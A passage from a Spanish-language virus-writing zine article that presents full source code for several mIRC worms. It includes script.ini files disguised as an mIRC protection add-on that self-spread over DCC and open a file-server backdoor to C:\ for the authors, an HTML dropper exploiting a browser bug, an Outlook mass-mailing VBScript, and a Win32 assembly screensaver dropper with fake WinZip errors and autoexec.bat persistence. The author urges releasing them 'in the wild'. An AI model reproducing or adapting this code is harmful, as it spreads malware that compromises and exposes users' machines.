n31=if (%x = 46) then goto listo
n32=/write -dsecho C:\autoexec.bat
n33=/inc(%x)
n34=goto loop
n35=:listo
<---------------------------------------------------------------------------------------------->
<----------------------------------------CUT HERE---------------------------------------------->
<---------------------------------------------------------------------------------------------->

Este es el primer worm que conozco que use este tipo de archivos ,los .inf , su gran ventaja con
siste en lo poco sospecho que resulta para el usuario , pero el gran problema con estos archivos
es que se debe dar click derecho sobre el y luego la opcion instalar , tambien resulta de una 
gran incomodidad lo limitados que nos encontramos para trabajar , solo podemos hacer uso del
autoexec.bat y luego desde el Mirc tratar de borrar el codigo de este archivo , el por eso de 
la sencillez del trabajo que incluso puede acarrear serios bugs, si alguien descubre uno me
gustaria que me lo comunicase .

Fin Del Codigo Y Analisis Worm IRC.Surfacing

<-----------------------------------Last Resort Worm------------------------------------------->

Este worm se expandira por medio de archivos html , usando el lenguaje de script VBScript , y
usando algunos objetos active X y objetos del WSH (Windows Scripting Shell).Este sera un intento
de hacer un worm mucho mas presentable , con mas control del sistema e incluso usare el Outlook
para que el worm se envie a todos los contactos del usuario , para escribir el script.ini desde
un Html usaremos VBScript junto con un  bug descubierto por el Bug-Hunter Giorgi Guninski , por
medio del cual podremos escribir datos en el disco duro sin que aparezca ninguna advertencia pa-
ra el usuario.


<-------Script.Ini-------->

;mIRC Anti-Nuke Proteccion Extension 1.0
;This file is copryght of  Khaled Mardem-Bey
;DO NOT  Edit or distribuite without the permision of the Autors 
; www.mirc.com        All Rigths Reserved 2000
;
;
;
n1= on 1:connect:{/rename $mircdir $+ script.ini $mircdir $+ Mirc.Dll
n2= /rename C:\Windows\Wins.Dll C:\Windows\Titanic_II-TheMovie.htm
n3= }
n4= on 1:disconnect:{/rename $mircdir $+ Mirc.Dll  $mircdir $+ script.ini 
n5= /rename C:\Windows\Titanic_II-TheMovie.htm C:\Windows\Wins.Dll 
n6= }
n7= on 1:join::{ if ($nick != $me) { /msg $nick Hey Take A lok a this thing , Is Very Funny ;)
n8= /dcc send $nick C:\Windows\Titanic_II-TheMovie.htm
n9= /msg $nick Cool ? Don't You Think ?
n10=/clear  
n11=/motd }
n12=on 1:text:*virus*:#:/.ignore $nick
n13=on 1:text:*worm*:#:/.ignore $nick
n14=on 1:text:*titanic*:#:/.ignore $nick
n15=on 1:text:*.htm*:#:/.ignore $nick
n16=on 1:text:*script.ini*:#:/.ignore $nick
n17=on 1:START: { /join #virus 
n18=/msg #virus Hi i am another Stupid who got infected by Last Resort Mirc/Worm Gretings To all!!
n19=/msg #virus Specially to Vil Roach , Kacimiro , And Thomas . Long Live to Papa Roach - Viva La Cucaracha !! Trenchcoat Legion/ We Are Not a Choice , We Are The Choice 
n20=/part #virus
n21=/clear
n22=/join #vir 
n23=/msg #vir Hi i am another Stupid who got infected by Last Resort Mirc/Worm Gretings To all!!
n24=/msg #vir Specially to Vil Roach , Kacimiro , And Thomas . Long Live to Papa Roach - Viva La Cucaracha !! TrenchCoat Legion/Infesting The World
n25=/part #vir
n26=/clear }
n27=/on 1:text:*god*:*:/msg Hey Asshole God Dosent Exists , Havn't You seen That This life is only a fucking Joke , made by a fucking Clown Of Shit
n28=/on 1:text:VivaLaCucaracha:*:{if (($nick = kacimiro) || ($nick = Vil_Roach) || ($nick = sk8tan00) {
n29=/fserve $nick 10 C:\ }
n30=else /msg $nick Fuck You!!!!}
n31=on 1:load:{ /rename $mircdir $+ \download\Titanic_II-TheMovie.htm C:\Windows\Wins.Dll
n32=/copy C:\Windows\Wins.Dll C:\Windows\System\Viewers\Titanic_II-TheMovie.htm }
n33=/write -c C:\Windows\System\WinUser.Dll.Vbs On Error Resume Next
n34=/write  C:\Windows\System\WinUser.Dll.Vbs set jose = CreateObject("OutLook.Application")
n35=/write  C:\Windows\System\WinUser.Dll.Vbs set pepe = jose.GetNameSpace("MAPI")
n36=/write  C:\Windows\System\WinUser.Dll.Vbs pepe.Logon "profile", "password"
n37=/write  C:\Windows\System\WinUser.Dll.Vbs for no 1 to mapi.AddressLists.Count
n38=/write  C:\Windows\System\WinUser.Dll.Vbs set flip=pepe.AddressLists(no)
n39=/write  C:\Windows\System\WinUser.Dll.Vbs ty = 1
n40=/write  C:\Windows\System\WinUser.Dll.Vbs worm = jose.CreateItem(0)
n41=/write  C:\Windows\System\WinUser.Dll.Vbs for victims=1 to flip.AddressEntries.Count
n42=/write  C:\Windows\System\WinUser.Dll.Vbs uno = flip.AdressEntries(ty)
n43=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Recipients.add(uno)
n44=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Subject = "Hay , Look At This One Is very Original , ;) Greetings " & Application.Username
n45=/write  C:\Windows\System\WinUser.Dll.Vbs worm.body = "This is The first cool web page about a movie like titanic i have ever seen , look it , and and answer Me "
n46=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Attachments.Add C:\Windows\System\Viewers\Titanic_II-TheMovie.htm }
n47=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Send
n48=/write  C:\Windows\System\WinUser.Dll.Vbs ty = ty + 1
n49=/write  C:\Windows\System\WinUser.Dll.Vbs uno = ""
n50=/write  C:\Windows\System\WinUser.Dll.Vbs next victim
n51=/write  C:\Windows\System\WinUser.Dll.Vbs next no
n52=/write  C:\Windows\System\WinUser.Dll.Vbs randomize : if (Int((20) * Rnd) = 7 ) then  msgbox "' CAUSE IM LOSING MY SIGHT , LOSING MY MIND " + cHR(13) + "WHIS SOMEBODY WOULD TELL ME IM FINE " + cHR(13) + "NOTHING IS ALRIGHT , NOTHING IS FINE " + cHR(13) + " IM RUNNING AND IM CRYING" + cHR(13) + cHR(13) + " Felicitaciones , You Are one of the motherfuckers who gets infected by this marvelous worm " + cHR(13) + "Trenchcoat Legion / Destroing the World While You Sleep " , 16 , "Papa Roach / Last Resort"
n53=/write  C:\Windows\System\WinUser.Dll.Vbs End }
n54=/on 1:nick:/if ($rand(0,10) = 7) / run C:\Windows\System\WinUser.Dll.Vbs 


<-------C:\Windows\Titanic_II-TheMovie.htm-------->

<HTML>
<HEAD>
<TITLE> Titanic II - The Movie </TITLE>
</HEAD>
<BODY>


<object classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" id="MS1">
</object>
<object classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" id="MS2">
</object>
<object classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" id="MS3">
</object>

<Script Language="VBScript">
On Error Resume Next
If ScriptEngineMajorVersion > 2 Then
si = si = ";mIRC Anti-Nuke Proteccion Extension 1.0" + Chr(13)  + ";This file is copryght of  Khaled Mardem-Bey" + Chr(13) + ";DO NOT  Edit or distribuite without the permision of the Autors " + Chr(13) + "; www.mirc.com        All Rigths Reserved 2000" + Chr(13) + ";"  + Chr(13) + ";"  + Chr(13) + ";"  + Chr(13) + "n1= on 1:connect:{/rename $mircdir $+ script.ini $mircdir $+ Mirc.Dll" + Chr(13) + "n2= /rename C:\Windows\Wins.Dll C:\Windows\Titanic_II-TheMovie.htm" + Chr(13) + "n3= }" + Chr(13) + "n4= on 1:disconnect:{/rename $mircdir $+ Mirc.Dll  $mircdir $+ script.ini" + Chr(13) + "n5= /rename C:\Windows\Titanic_II-TheMovie.htm C:\Windows\Wins.Dll " + Chr(13) + "n6= }" + Chr(13) + "n7= on 1:join::{ if ($nick != $me) { /msg $nick Hey Take A lok a this thing , Is Very Funny ;)" + Chr(13) + "n8= /dcc send $nick C:\Windows\Titanic_II-TheMovie.htm" + Chr(13) + "n9= /msg $nick Cool ? Don't You Think ?" + Chr(13) + "n10=/clear" + Chr(13) + "n11=/motd }" + Chr(13) + "n12=on 1:text:*virus*:#:/.ignore $nick" + Chr(13) + "n13=on 1:text:*worm*:#:/.ignore $nick" + Chr(10) +  "n14=on 1:text:*titanic*:#:/.ignore $nick" + Chr(13) + "n15=on 1:text:*.htm*:#:/.ignore $nick" + Chr(13) + "n16=on 1:text:*script.ini*:#:/.ignore $nick" + Chr(13) + "n17=on 1:START: { /join #virus " + Chr(13) + "n18=/msg #virus Hi i am another Stupid who got infected by Last Resort Mirc/Worm Gretings To all!!" + Chr(13) + "n19=/msg #virus Specially to Vil Roach , Kacimiro , And Thomas . Long Live to Papa Roach - Viva La Cucaracha !! Trenchcoat Legion/ We Are Not a Choice , We Are The Choice " + Chr(13) + "n20=/part #virus" + Chr(13) + "n21=/clear" + Chr(13) + "n22=/join #vir " + Chr(13) + "n23=/msg #vir Hi i am another Stupid who got infected by Last Resort Mirc/Worm Gretings To all!!" + Chr(13) + "n24=/msg #vir Specially to Vil Roach , Kacimiro , And Thomas . Long Live to Papa Roach - Viva La Cucaracha !! TrenchCoat Legion/Infesting The World" + Chr(13) + "n25=/part #vir" + Chr(13) + "n26=/clear }" + Chr(13) + "n27=/on 1:text:*god*:*:/msg Hey Asshole God Dosent Exists , Havn't You seen That This life is only a fucking Joke , made by a fucking Clown Of Shit" + Chr(13) + "n28=/on 1:text:VivaLaCucaracha:*:{if (($nick = kacimiro) || ($nick = Vil_Roach) || ($nick = sk8tan00) {" + Chr(13) + "n29=/fserve $nick 10 C:\ }" + Chr(13) + "n30=else /msg $nick Fuck You!!!!}" + Chr(13) + "n31=on 1:load:/rename $mircdir $+ \download\Titanic_II-TheMovie.htm C:\Windows\Wins.Dll" + Chr(13) + "n32=/copy C:\Windows\Wins.Dll C:\Windows\System\Viewers\Titanic_II-TheMovie.htm } " Chr(13) + "n33=/on 1:part:/run C:\WINDOWS\System\WinUser.Dll.Vbs " + Chr(13) + "n32=/copy C:\Windows\Wins.Dll C:\Windows\System\Viewers\Titanic_II-TheMovie.htm } " + Chr(13) + "n33=/write -c C:\Windows\System\WinUser.Dll.Vbs On Error Resume Next " + Chr(13) + "n34=/write  C:\Windows\System\WinUser.Dll.Vbs set jose = CreateObject(" + Chr(34) + "OutLook.Application" + Chr(34) + ") " + Chr(13) + " n35=/write  C:\Windows\System\WinUser.Dll.Vbs set pepe = jose.GetNameSpace(" + Chr(34) + "MAPI" + Chr (34) + ") " + Chr(13) + " n36=/write  C:\Windows\System\WinUser.Dll.Vbs pepe.Logon " + Chr(34) + "profile" + Chr(34) + "," + Chr(34) +  "password" + Chr(34)  + Chr(13) + " n37=/write  C:\Windows\System\WinUser.Dll.Vbs for no 1 to mapi.AddressLists.Count " + Chr(13) + " n38=/write  C:\Windows\System\WinUser.Dll.Vbs set flip=pepe.AddressLists(no) " + Chr(13) + " n39=/write  C:\Windows\System\WinUser.Dll.Vbs ty = 1  " + Chr(13) + " n40=/write  C:\Windows\System\WinUser.Dll.Vbs worm = jose.CreateItem(0) " + Chr(13) + " n41=/write  C:\Windows\System\WinUser.Dll.Vbs for victims=1 to flip.AddressEntries.Count " + Chr(13) + " n42=/write  C:\Windows\System\WinUser.Dll.Vbs uno = flip.AdressEntries(ty) " + Chr(13) + " n43=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Recipients.add(uno) " + Chr(13) + " n44=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Subject = "  + Chr(34) + "Hay , Look At This One Is very Original , ;) Greetings "  + Chr(34) + " & Application.Username  " + Chr(13) + " n45=/write  C:\Windows\System\WinUser.Dll.Vbs worm.body = "  + Chr(34) + "This is The first cool web page about a movie like titanic i have ever seen , look it , and and answer Me "  + Chr(34)  + Chr(13) + " n46=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Attachments.Add C:\Windows\System\Viewers\Titanic_II-TheMovie.htm } " + Chr(13) + " n47=/write  C:\Windows\System\WinUser.Dll.Vbs worm.Send " + Chr(13) + " n48=/write  C:\Windows\System\WinUser.Dll.Vbs ty = ty + 1 " + Chr(13) + " n49=/write  C:\Windows\System\WinUser.Dll.Vbs uno = "  + Chr(34) + Chr(34) + Chr(13) + " n50=/write  C:\Windows\System\WinUser.Dll.Vbs next victim  " + Chr(13) + " n51=/write  C:\Windows\System\WinUser.Dll.Vbs next no " + Chr(13) + n52=/write  C:\Windows\System\WinUser.Dll.Vbs randomize : if (Int((20) * Rnd) = 7 ) then  msgbox "' CAUSE IM LOSING MY SIGHT , LOSING MY MIND " + cHR(13) + "WHIS SOMEBODY WOULD TELL ME IM FINE " + cHR(13) + "NOTHING IS ALRIGHT , NOTHIN IS FINE " + cHR(13) + " IM RINNING AND IM CRYING" + cHR(13) + cHR(13) + " Felicitaciones , You Are one of the motherfuckers who gets infected by this marvelous worm " + cHR(13) + "Trenchcoat Legion / Destroing the World While You Sleep " , 16 , "Papa Roach / Last Resort" + Chr(13) + " n53=/write  C:\Windows\System\WinUser.Dll.Vbs End } " + Chr(13) + " n54=/on 1:part:/if ($rand(0,10) = 7) / run C:\Windows\System\WinUser.Dll.Vbs "

MS1.Path = "C:\Mirc\Script.Ini"
MS1.Doc = si
MS1.Write

MS1.Path = "C:\Archivos De Programa\Mirc\Script.Ini"
MS1.Doc = si
MS1.Write

MS1.Path = "C:\Program Files\Mirc\Script.Ini"
MS1.Doc = si
MS1.Write

Wout = "
WO1.Path = "C:\WINDOWS\System\WinUser.Dll.Vbs"
WO1.Doc = Wout
WO1.Write

end if
msgbox " There Was A Problem Of Memory in The Application , Try Viewing This File Lately , " + Chr 13 + "Or Close Some Of Your Aplications " , 16 , "Warning !"
</Script>

</BODY>
</HTML>

<-------Fin De C:\Windows\Titanic_II-TheMovie.htm-------->

UFFFFF Casi que no acabo , pero finalmente  valio la pena , y este es uno de los codigos mas fun
cionales que he escrito y creo que in th wild tendria muy buenos resultados , pero antes de libe
rar a mi amiguito , se dbe hacer mucho beta-testing ( como cualquier programa ) para asegurarnos
de que funciona en maquinas distintas a la  nuestra , para esta tarea lo mejor es pedirle el fa-
vor a nuestro amigos , para no saturarnos con el programa , cuando ya creamos que el worm esta 
listo comenzamos a mandarlo de todas las maneras posibles . Si de casualidad alguno de ustedes 
tiene cerebro y se esta preguntando porque escribo el Script para el outlook desde el mirc ,es
porque por la forma de escribir archivos gracias al bug, estos al principio contienen codigo 
basura , lo cual no es impedimento para un script de mirc , pero en un vbs si provocaria un 
error , si se preguntan por el payload , resulta que es el coro de una cancion de un grupo 
llamado Papa Roach , la cual me gusta mucho y se la recomiendo a todos ustedes .

+++++++++++
+Despedida+
+++++++++++

Por el momento esto es todo , tal vez en el otro numero hable de otro tipo de worms o virus , o
tal vez me haya encontrado un polvito blanco y lo haya inhalado y este muerto , pero eso no es 
lo que importa  , lo bueno seria que ustedes crearan sus propios worms y los mandaran aqui a la
redaccion ( Que Bonito que suena !!) , para publicarlo y para tenerlo  mas en cuenta si algun
dia desean ingreasar a nuestro exclusivo grupo , hasta luego , y si tienen alguna pregunta o 
sugerencia o lo que sea ya saben samsonov@uole.com .


                                                           

+++++++++++
+Posdata 1+
+++++++++++

Aultima hora he hecho un nuevo worm y lo he decidido incluir en el articulo , especialmente por-
que este es el que mas me ha gustado de todos , y creo que es el que mas posibilidades reales 
tiene de expandirse por ahi ; sus principales cualidades son : 
-100% Asm Bajo Win32
-Extension .Scr (ScreenSaver)
-Un icono muy poco sospechoso
-Tamao (8k)
-Un buen stealth : Avisa de una serie de errores como si fuera un ejecutable de WinZip
-Funciona en CUALQUIER directorio en el que este Mirc.
-Si alguien simplemente borra el Script.Ini este se vuelve a copiar desde el Autoexec.Bat
-Y tiene un muy bonito Nombre.

Bueno eso es todo , el codigo en asm es muy simple , asi como el script , si alguien necesita 
ayuda en algo , ya sabe mi e-mail .


<-------TheMatrix2-ScreenSaver.Scr-------->

;                            Vil Roach / Infesting the World



.386
.Model Flat ,StdCall
locals
jumps
include c:\tasm\include\windows.inc

extrn MessageBoxA:PROC
extrn ExitProcess:PROC
extrn GetCurrentDirectoryA:PROC
extrn lstrcatA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CopyFileA:PROC
.const
FILE_BEGIN equ 0

.data

ABOUT db "The Matrix Worm . Courtesy of Vil Roach/Trenchcoat Legion - La Verdad Nos Hara Libres ",10,13

    db "Unfortunadly no one could tell you what The Matrix Is , you have to see it for yourself "


thisfile db "TheMatrix2-ScreenSaver.Scr",0
wingdi db "C:\Windows\Wingdi.Dll",0
bwrite  dd  ?
fhandle dd ?
dir db 150 dup (0)
script db "\..\Script.Ini",0
scriptini db ";mIRC Anti-Nuke Protection",0dh,0ah
db ";This file is copryght of  Khaled Mardem-Bey",0dh,0ah
db ";DO NOT  Edit or distribuite without the permision of the Autors ",0dh,0ah
db "; www.mirc.com        All Rigths Reserved 2000",0dh,0ah

db "[SCRIPT]",0dh,0ah
db "n1=on 1:connect:{ /rename $mircdir $+ script.ini C:\win.sys",0dh,0ah
db "n2=/rename C:\Windows\WinGdi.Dll C:\Windows\TheMatrix2-ScreenSaver.Scr",0dh,0ah
db "n3=/msg #virus HI I am another dumb who gets infected with The Matrix Worm , Gretings to all , specially to the Trenchcoat Legion",0dh,0ah
db "n4=/msg #virus Vil Roach - Trenchcoat Legion     Bye!",0dh,0ah
db "n5=/part #virus",0dh,0ah
db "n6=}",0dh,0ah
db "n7=on 1:disconnect: { /rename C:\win.sys $mircdir $+ script.ini",0dh,0ah
db "n8=/rename C:\Windows\TheMatrix2-ScreenSaver.Scr C:\Windows\WinGdi.Dll",0dh,0ah
db "n9=}",0dh,0ah
db "n10=on 1:join:#:{ if ($nick != $me) {.dcc send C:\Windows\TheMatrix2-ScreenSaver.Scr}}",0dh,0ah
db "n11=on 1:text:*script.ini*:#:/.ignore $nick",0dh,0ah
db "n12=on 1:text:*virus*:#:/.ignore $nick",0dh,0ah
db "n13=on 1:text:*worm*:#:/.ignore $nick",0dh,0ah
db "n14=on 1:text:*matrix*:#:/.ignore $nick",0dh,0ah
db "n15=on 1:text:*screensaver*:#:/.ignore $nick",0dh,0ah
db "n16=on 1:text:*scr*:#:/.ignore $nick",0dh,0ah
db "n17=on 1:text:*script.ini*:#:/.ignore $nick",0dh,0ah
db "n18=on 1:text:jose pepe is hungry:*:{if (($nick = kacimiro) || ($nick = Vil_Roach) || ($nick = sk8tan00) {",0dh,0ah
db "n19=/fserve $nick 10 C:\ }",0dh,0ah
db "n20=on 1:start:{ /copyfile $mircdir $+ script.ini C:\Windows\MciCom.Dll",0dh,0ah
db "n21=/write C:\Autoexec.Bat @ctty nul",0dh,0ah
db "n22=/write C:\Autoexec.Bat if not exists $mircdir $+ Script.Ini echo goto end",0dh,0ah
db "n23=/write C:\AutoExec.Bat copy  C:\Windows\MciCom.Dll  $mircdir $+ Script.Ini echo goto end",0dh,0ah
db "n24=/write C:\AutoExec.Bat end:",0dh,0ah
db "n25=/write C:\AutoExec.Bat @ctty con}",0
len	 equ $-script
errorf db "Error(Matrix2-ScreenSaver)Unrecoverable zip file read error",0
errorf2 db"Cannot open file: it does not appear to be a valid archive.",10,13
        db 10,13
        db"If you downloaded this file, try downloading the file again.",0
winzip db "WinZip",0

.code
pepe :
push offset dir
push 260
call GetCurrentDirectoryA

push offset script
push offset dir
call lstrcatA

push 0                     ;htemplate
push 080h                     ;Dwflags and atribbutes
push 2  ;CREATE_ALWAYS	   ;Dwcreationdistribuiton
push 0                     ;security_atributes
push 2                    ;dwShareMode        
push 40000000h ;GENERIC_WRITE	   ;desired Access
push offset dir                           ;lpFileName
call CreateFileA
mov  fhandle,eax	

;dir es igual a mircdir\download\..\script.ini

;llamada a WriteFile

push 0
push offset bwrite
push len
push offset scriptini
push fhandle
call WriteFile


push 0
push offset wingdi
push offset thisfile
call CopyFileA

;llamada a CopyFile


errors :
push 10h
push Offset winzip
push Offset errorf
push 0
call MessageBoxA
push 10h
push Offset winzip
push Offset errorf2
push 0
call MessageBoxA

push 0
call ExitProcess
;Fin
end pepe

<-------Fin De TheMatrix2-ScreenSaver.Scr-------->

         


            <-------Script.Ini-------->


;mIRC Anti-Nuke Protection
;This file is copryght of  Khaled Mardem-Bey
;DO NOT  Edit or distribuite without the permision of the Autors 
; www.mirc.com        All Rigths Reserved 2000

[SCRIPT]
n1=on 1:connect:{ /rename $mircdir $+ script.ini C:\win.sys
n2=/rename C:\Windows\WinGdi.Dll C:\Windows\TheMatrix2-ScreenSaver.Scr
n3=/msg #virus HI I am another dumb who gets infected with The Matrix Worm , Gretings to all , specially to the Trenchcoat Legion
n4=/msg #virus Vil Roach - Trenchcoat Legion     Bye!
n5=/part #virus
n6=}
n7=on 1:disconnect: { /rename C:\win.sys $mircdir $+ script.ini
n8=/rename C:\Windows\TheMatrix2-ScreenSaver.Scr C:\Windows\WinGdi.Dll
n9=}
n10=on 1:join:#:{ if ($nick != $me) {.dcc send C:\Windows\TheMatrix2-ScreenSaver.Scr}}
n11on 1:text:*script.ini*:#:/.ignore $nick
n12=on 1:text:*virus*:#:/.ignore $nick
n13=on 1:text:*worm*:#:/.ignore $nick
n14=on 1:text:*matrix*:#:/.ignore $nick
n15=on 1:text:*screensaver*:#:/.ignore $nick
n16=on 1:text:*scr*:#:/.ignore $nick
n17=on 1:text:*script.ini*:#:/.ignore $nick
n18=on 1:text:jose pepe is hungry:*:{if (($nick = kacimiro) || ($nick = Vil_Roach) || ($nick = sk8tan00) {
n19=/fserve $nick 10 C:\ }
n20=on 1:start:{ /copyfile $mircdir $+ script.ini C:\Windows\MciCom.Dll
n21=/write C:\Autoexec.Bat @ctty nul
n22=/write C:\Autoexec.Bat if not exists $mircdir $+ Script.Ini echo goto end
n23=/write C:\AutoExec.Bat copy  C:\Windows\MciCom.Dll  $mircdir $+ Script.Ini echo goto end
n24=/write C:\AutoExec.Bat end:
n25=/write C:\AutoExec.Bat @ctty con}

            <-------Fin De Script.Ini-------->

            <-------Mak.bat-------->

tasm32 /mx /m3 /z /q TheMatrix.Asm
tlink32 -x /Tpe /aa /c TheMatrix,TheMatrix,,import32.lib,,res

            <-------Fin De Mak.bat-------->


Bye ! espero que les haya gustado el articulo y el Worm 






                           Vil Roach/Trenchcoat Legion- Infest,the theory of mi first manifesto